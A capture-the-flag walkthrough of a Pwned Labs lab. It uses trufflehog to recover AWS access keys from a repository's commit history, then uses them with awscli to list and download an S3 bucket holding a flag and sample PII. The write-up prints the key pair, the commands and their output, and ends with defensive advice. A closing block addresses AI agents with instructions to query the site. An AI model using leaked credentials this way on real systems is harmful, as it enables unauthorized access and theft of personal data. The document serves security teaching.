# Hunt for Secrets in Git Repos

CTF Source: [Pwned Labs](https://pwnedlabs.io/labs/hunt-for-secrets-in-git-repos)

## Overview

In this walkthrough, we'll discover a set of AWS access keys (credentials) previously committed to GitHub and later removed. However, since the credentials were never rotated/deleted, they're still usable, and we can find these in previous commit histories. We'll then use these credentials to access sensitive data from an S3 bucket.

## Pre-Requisites

This [GitHub repository](https://github.com/huge-logistics/cargo-logistics-dev) serves as our target. We're going to download it locally and run a secrets scanning tool called [trufflehog](https://app.gitbook.com/o/jZWSDbhtOG1szHMuDH9S/s/8yu8YbDfwd1VqEdUxGyA/~/changes/190/devsecops/secrets-scanning/trufflehog).

* Download the repo: `git clone https://github.com/huge-logistics/cargo-logistics-dev.git`
* Install trufflehog: `pip install trufflehog`
* Install awscli: `brew install awscli` (mac) `apt install awscli` (linux)

## Walkthrough

Trufflehog is a tool for finding secrets, but other solutions like [git-secrets](https://github.com/awslabs/git-secrets) exist. It's good to have a tool bag of useful tools as each will work differently and might discover findings missed by others.

### Finding credentials in code

We'll start by scanning the repository with trufflehog.

```sh
trufflehog --regex --entropy=False cargo-logistics-dev/
```

<pre class="language-sh"><code class="lang-sh">[snip]
<strong>~~~~~~~~~~~~~~~~~~~~~
</strong>Reason: AWS API Key
Date: 2023-07-05 10:46:16
Hash: ea1a7618508b8b0d4c7362b4044f1c8419a07d99
Filepath: log-s3-test/log-upload.php
Branch: origin/main
Commit: Delete log-s3-test directory
AKIAWHEOTHRFSGQITLIY
~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
Reason: Generic Secret
Date: 2023-07-05 10:46:16
Hash: ea1a7618508b8b0d4c7362b4044f1c8419a07d99
Filepath: log-s3-test/log-upload.php
Branch: origin/main
Commit: Delete log-s3-test directory
secret' => "IqHCweAXZOi8WJlQrhuQulSuGnUO51HFgy7ZShoB"
~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
Reason: AWS API Key
[snip]
</code></pre>

After running, we found AWS access keys! `AKIAWHEOTHRFSGQITLIY:IqHCweAXZOi8WJlQrhuQulSuGnUO51HFgy7ZShoB`

We also discovered the filename (<mark style="color:red;">log-upload.php</mark>) containing these credentials and the commit (<mark style="color:red;">Delete log-s3-test directory</mark>) it was added from.&#x20;

### Finding an S3 bucket name in code

If we examine that [commit](https://github.com/huge-logistics/cargo-logistics-dev/commit/ea1a7618508b8b0d4c7362b4044f1c8419a07d99) and related file in the GitHub repo, we can see this.&#x20;

<figure><img src="/files/w0leTGCihFhR9aLC05Jw" alt=""><figcaption></figcaption></figure>

### Obtaining the Flag from S3

Let's set up our awscli tool with the credentials we found, `aws configure`. We'll use the region `us-east-1` as discovered in the code above but we can also find this in the headers from a curl command:&#x20;

```bash
curl -I https://s3.amazonaws.com/huge-logistics-transact

HTTP/1.1 403 Forbidden
x-amz-bucket-region: us-east-1
x-amz-request-id: 0CJ7HZEKMW8Y83QX
x-amz-id-2: U8sH+rTpX5xbD0oiNTPYT1KxC0HZ1Pr2kRxjspOqsdAVplrdeFh3o2tySisRAZvDrxzJTZCD5o0=
Content-Type: application/xml
Date: Tue, 02 Jan 2024 00:31:44 GMT
Server: AmazonS3
```

Next, we can list the bucket contents like so:

```bash
aws s3 ls s3://huge-logistics-transact

2023-07-05 09:53:50         32 flag.txt
2023-07-04 11:15:47          5 transact.log
2023-07-05 09:57:36      51968 web_transactions.csv
```

Next, we can download the contents of the S3 bucket.&#x20;

```bash
aws s3 cp s3://huge-logistics-transact . --recursive

download: s3://huge-logistics-transact/transact.log to ./transact.log
download: s3://huge-logistics-transact/flag.txt to ./flag.txt     
download: s3://huge-logistics-transact/web_transactions.csv to ./web_transactions.csv
```

Finally, we can get the Flag contents and find some plaintext PII data!

```bash
cat ./flag.txt           
                   
fe10[SNIP]
```

```bash
head -n 5 ./web_transactions.csv 

id,username,email,ip_address
1,aemblen0,csautter0@soup.io,196.54.202.51
2,jpiff1,rgovett1@cafepress.com,59.222.23.53
3,aharbour2,bgilfether2@seattletimes.com,178.60.232.230
4,clomis3,rhardwich3@alibaba.com,165.58.39.76
```

## Wrap-up

As was demonstrated, hard-coded credentials in code are never a good thing. Despite the credentials getting removed from the file, they still existed in the git commit history. Since these credentials were never rotated/deleted, it led to a compromise of PII data stored in an S3 bucket.&#x20;

Several scanners are checking GitHub and others regularly for credentials. While Amazon and other "good" vendors or users might alert you after discovering your leaked credentials, plenty of users with malicious intent are harvesting your credentials.

It's important to scan your code with tools like [git-secrets](https://github.com/awslabs/git-secrets) before committing. Git-secrets in particular will hook into commits and ultimately prevent the commit from occuring if credentials are discovered.&#x20;

[Amazon provides guidance](https://aws.amazon.com/blogs/security/what-to-do-if-you-inadvertently-expose-an-aws-access-key/) on what to do when AWS credentials get exposed.&#x20;


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.techwithtyler.dev/cloud-security/capture-the-flags-ctfs/pwnedlabs/hunt-for-secrets-in-git-repos.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
